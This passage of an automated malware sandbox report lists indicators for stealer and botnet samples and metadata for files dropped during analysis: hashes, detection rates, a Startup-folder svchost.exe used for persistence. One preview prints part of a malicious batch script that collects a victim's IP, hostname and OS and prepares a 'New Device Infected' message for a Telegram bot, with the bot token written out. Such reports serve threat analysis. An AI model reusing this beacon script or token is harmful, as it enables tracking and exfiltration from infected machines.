                                    • 104.21.80.1
                                    WonderHack.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.66.86
                                    installer.msiGet hashmaliciousUnknownBrowse
                                    • 172.67.164.25
                                    external.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.19.35
                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                    • 172.64.41.3
                                    Launcher.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.66.86
                                    Setup.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.151.193
                                    Setup.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.191.144
                                    Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.63.229
                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                    • 162.158.254.178

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eLoader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    HLMJbase.dllGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    HLMJbase.dllGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    • 149.154.167.220
                                    • 104.26.13.205

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8192
                                    Entropy (8bit):0.363788168458258
                                    Encrypted:false
                                    SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                    MD5:0E72F896C84F1457C62C0E20338FAC0D
                                    SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                    SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                    SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                    Malicious:false
                                    Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):1.3107386184942755
                                    Encrypted:false
                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
                                    MD5:951C6A0161E5037F7D8B292965F95CC4
                                    SHA1:20FAD3DDCCC208D88CA843B4BC4CE23BD5284E5D
                                    SHA-256:A03B0DCA6F93CED313DC76205394A6663507536B466AD8A3D4C47B12F89984F2
                                    SHA-512:7142129126ED14E0FC919EA2D62E696A65BF87B9022A83401F499F251B7175AC5CACF6F6F795FEBF82655A16DBC276D2F7B17615FE0A31240F3F9827B5DE8E79
                                    Malicious:false
                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xea210a0f, page size 16384, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.42210399898945045
                                    Encrypted:false
                                    SSDEEP:1536:nSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:nazag03A2UrzJDO
                                    MD5:4DB7D318CD8CD7717AE5B3030A57163D
                                    SHA1:7093C48906D12EA6CC292564A9F08CFA97962E46
                                    SHA-256:98E186D1BEAF15B2A209AB96E943A195D9DA2402258A540B83553484A35733D5
                                    SHA-512:0EFB8F5C1F96BEEA7E1A24AE03126E1D8EFB53ABA2D91CA15F035994BC152C31F5F87373C58E9702DE7163A057B47F800EF78AB9DBC0B8F92DA9BB79CC490BC5
                                    Malicious:false
                                    Preview:.!..... .......Y.......X\...;...{......................n.%.....!....|.......|..h.#.....!....|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................oH.f!....|...................m!....|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.074089380346648
                                    Encrypted:false
                                    SSDEEP:3:ylllWetYeAgyky/FpXX6AylE0Ax8/illOE/tlnl+/rTc:ylbzPyLaAcE0Ax8epMP
                                    MD5:1DD32939798E0CD79CF1CCE4B59F7180
                                    SHA1:57280F6DA1CA4439D48645FC4F71BFC4198CA72A
                                    SHA-256:DB1FE5FDF4E437A1DDDBF47C3B3E734966B9293D4C92F8F86D0D724CD05D855E
                                    SHA-512:C362BBD0C2F3455AF791996289238D237AF78B2C2F2556D1A5262A290036CCB15D01490C4466793967C312AA8338E4C14CAD6EC4F6409DD2A6855CE5B8625241
                                    Malicious:false
                                    Preview:.B.l.....................................;...{.......|..!....|..........!....|..!....|..6W..!....|m..................m!....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):187392
                                    Entropy (8bit):6.963700877666065
                                    Encrypted:false
                                    SSDEEP:3072:NUFRop3/6D5n1rDKFcweOp8mAt7Coo1p4JI0KnKDvxJvKV:qjPVDOcweOp8mOL2p4JI0iKv
                                    MD5:A3027B4F632E949EF06C151BD8787FAF
                                    SHA1:5609C029F9D7D184F55ED113051669B72622B98F
                                    SHA-256:CE36AB4681BD40BD28337984B10EAA6B1248CCA3A84E52BF6A03D6BF1DDC030D
                                    SHA-512:B92D0F5C613933AF203F62BB257C96DBAB84ABD0384E13DFDF97D21C108201089D91E744C8364ED02B3E5FA7EBEEF1762EDF7804832A8E9EA035159990840B2C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 63%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F..F..F.F.z..F...I..F...|..F...H..F..>a..F..>q..F..F.F...M..F......F.Rich.F.........PE..L...................................c.............@.................................s...........................................x...................................................................X...@............................................text.............................. ..`.rdata...O.......P..................@..@.data...............................`....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\svchost\svchost.exe

                                    Download File
                                    Process:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):187392
                                    Entropy (8bit):6.963700877666065
                                    Encrypted:false
                                    SSDEEP:3072:NUFRop3/6D5n1rDKFcweOp8mAt7Coo1p4JI0KnKDvxJvKV:qjPVDOcweOp8mOL2p4JI0iKv
                                    MD5:A3027B4F632E949EF06C151BD8787FAF
                                    SHA1:5609C029F9D7D184F55ED113051669B72622B98F
                                    SHA-256:CE36AB4681BD40BD28337984B10EAA6B1248CCA3A84E52BF6A03D6BF1DDC030D
                                    SHA-512:B92D0F5C613933AF203F62BB257C96DBAB84ABD0384E13DFDF97D21C108201089D91E744C8364ED02B3E5FA7EBEEF1762EDF7804832A8E9EA035159990840B2C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 63%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F..F..F.F.z..F...I..F...|..F...H..F..>a..F..>q..F..F.F...M..F......F.Rich.F.........PE..L...................................c.............@.................................s...........................................x...................................................................X...@............................................text.............................. ..`.rdata...O.......P..................@..@.data...............................`....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1588
                                    Entropy (8bit):5.614529068256494
                                    Encrypted:false
                                    SSDEEP:48:kSU4xymdajms4RIoUxqr9tK8NLyku9OjlZS5GhNg:9HxvJsIfeqr2KLyHOZZ4kNg
                                    MD5:55D7C5BA0B065434584BC30D66E5B9FE
                                    SHA1:CFCB5D905CE736C50849AC8E420AC11413FD382C
                                    SHA-256:AF7BAC94418A9CD5390ECC73DFAD3A479858F2D229424C5D2512C7EF76877B47
                                    SHA-512:ECA4CA396028F20CAF33E2C65FB49F6E2ADEC8A430310F6FE5F0DFA2582A48C4C7D0337860010CEED2D3D8DA816EB3D0F4A6A48F846C8F1DF7DF3DD16F7532C6
                                    Malicious:false
                                    Preview:@...e...........b...............................................@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                    C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\tg.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1284
                                    Entropy (8bit):5.323297766564296
                                    Encrypted:false
                                    SSDEEP:24:QxiRbZbBiRqB3+QeL/7Amk7qaO7osBtHstuLMiv2Af+wPj:rbdBiEBut/7D+yok1s8LZv2A28
                                    MD5:D094D92CFDD4BA9B839122A175C59130
                                    SHA1:599DFD03AB835DA6C53D468E79405A369FBA8BC6
                                    SHA-256:DD3B2B5FB6ED84798054474779F953DFBB93359FB46B1B0C235F348904794751
                                    SHA-512:8088FBEF90F5EF5BF4948F6A41B74D26DBE5605FB0D540FE434D206CDB12B8AC9A8362CF550C4B5D73BFD99F07EC49AA8347BB8531ED8F557B999A549DE26F5D
                                    Malicious:true
                                    Preview:@shift /0..@echo off..:: Define Telegram bot details..set botToken=7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ..set chatId=6734985705....:: Get current date and time using PowerShell..for /f "delims=" %%i in ('powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"') do set currentDate=%%i....:: Get the public IP address..for /f "delims=" %%i in ('powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"') do set publicIp=%%i....:: Get local machine information (hostname, OS version, and architecture)..for /f "delims=" %%i in ('powershell -Command "$env:COMPUTERNAME"') do set hostname=%%i..for /f "delims=" %%i in ('powershell -Command "[System.Environment]::OSVersion"') do set os=%%i..for /f "delims=" %%i in ('powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"') do set architecture=%%i....:: Compose the message..set message= @New Device Infected!!!, > System Information: Date: %currentDate%, Hostname: %hostname%,

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00qwdthq.aht.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wshwtd4.q40.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2pejul4z.rwb.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lgxcyoi.yew.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hvjyisb.mah.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqhvemlw.iw1.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izludchf.qku.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq0we2su.zcg.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_li3fuojp.raw.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhgmjwfz.2hu.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ornbzthe.x3i.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfgeva4g.xse.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soxafbxg.hi1.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkswf4xp.y3d.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3mn4vpi.nc0.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziuhystr.kdp.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\client.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):29830891
                                    Entropy (8bit):5.975290766049405
                                    Encrypted:false
                                    SSDEEP:196608:RECz7ECs7n7XVN7JHz6XfiedozPm8bIC8XkDbcxqgJ:o7771z7BsC8McF
                                    MD5:0302EF4E965477DD225B298374C62722
                                    SHA1:8F810D96CEF93411AE6E9A14EA02B174CA3CF533
                                    SHA-256:8EAF38FD9353ACBE0BCA3893F176D2BAD346501C727AA20E588B7792F676EECE
                                    SHA-512:268BE3E500076AE8660B98A43AE00D00CEAB000FD8869ADFE5A0531A80A2E0651BB8AABA0611634AC66F02561E224A3A8A1CD5E9266E0B135A904EC080C8B21F
                                    Malicious:true
